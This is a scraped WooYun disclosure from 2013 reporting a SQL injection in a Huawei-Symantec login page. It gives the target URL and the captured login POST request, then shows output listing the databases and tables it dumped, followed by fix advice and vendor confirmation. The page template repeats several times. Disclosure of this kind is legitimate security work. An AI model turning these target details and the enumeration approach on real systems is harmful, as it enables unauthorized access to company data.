华为某系统SQL注射漏洞一枚 | wooyun-2013-039357| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-039357

漏洞标题：华为某系统SQL注射漏洞一枚

漏洞作者：小胖子

提交时间：2013-10-11 12:00

修复时间：2013-11-25 12:01

公开时间：2013-11-25 12:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-10-11：细节已通知厂商并且等待厂商处理中
2013-10-14：厂商已经确认，细节仅向厂商公开
2013-10-24：细节向核心白帽子及相关领域专家公开
2013-11-03：细节向普通白帽子公开
2013-11-13：细节向实习白帽子公开
2013-11-25：细节向公众公开

简要描述：

看情况继续，华赛是华为的吧？以前有人提交过这个站的洞。

详细说明：

系统地址：

https://gdp.huaweisymantec.com/hwdgd/jsp/comm/loginproc.jsp

https，登陆框没有过滤，导致注入。抓SSL的登陆包

POST https://gdp.huaweisymantec.com/hwdgd/jsp/comm/loginproc.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://gdp.huaweisymantec.com/hwdgd/jsp/comm/login.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: gdp.huaweisymantec.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=9e2575ebe95bfffffffffdbc73c0e1f253ee
username=1&password=1&Submit=Login

果断是注入了。

注入得到的数据库

available databases [6]:
[*] HWGDP
[*] PERFSTAT
[*] PORTAL
[*] SYS
[*] SYSTEM
[*] WMSYS

当前数据库的表：

Database: HWGDP
[22 tables]
+---------------------+
| DELIVERRIGHT        |
| FILE_ENTITY         |
| LOGIN_INFO          |
| MAS_BACKEND_USER    |
| MAS_CATEGORY        |
| MAS_CLIENT          |
| MAS_CODE            |
| MAS_DELIVERED_FILE  |
| MAS_DELIVERED_ORDER |
| MAS_FILE_KIND       |
| MAS_LANGUAGE        |
| MAS_SECLEVEL        |
| MAS_SEQUENCE        |
| MAS_TRACE_INFO      |
| MAS_VERSION         |
| MULTI_FILE_PRE      |
| MULTI_FILE_PRE_DTL  |
| MULTI_USER_PRE      |
| MULTI_USER_PRE_DTL  |
| RECEIVERIGHT        |
| TOAD_PLAN_SQL       |
| TOAD_PLAN_TABLE     |
+---------------------+

漏洞证明：

见详细说明。

修复方案：

0x1：不能完全依赖SSL
0x2：任何点都要过滤，登陆框也能注入的。
0x3：求高rank啊！

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2013-10-14 16:31

厂商回复：

感谢白帽子小胖子提交漏洞，已通知业务部门对该漏洞跟进处理

漏洞评价：

2013-10-11 12:26 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了，刷分还是不刷？)

华为的IP可多了，小胖要大显身手了
2013-10-11 12:29 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

@霍大然 ..............我就是才看到有华为的确认了我才提交一个看看啊~继续不继续再说吧，最近有点忙~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-039357

漏洞标题：华为某系统SQL注射漏洞一枚

相关厂商：华为技术有限公司

漏洞作者：小胖子

提交时间：2013-10-11 12:00

修复时间：2013-11-25 12:01

公开时间：2013-11-25 12:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-039357

漏洞标题：华为某系统SQL注射漏洞一枚

相关厂商：华为技术有限公司

漏洞作者： 小胖子

提交时间：2013-10-11 12:00

修复时间：2013-11-25 12:01

公开时间：2013-11-25 12:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-039357"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小胖子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小胖子@乌云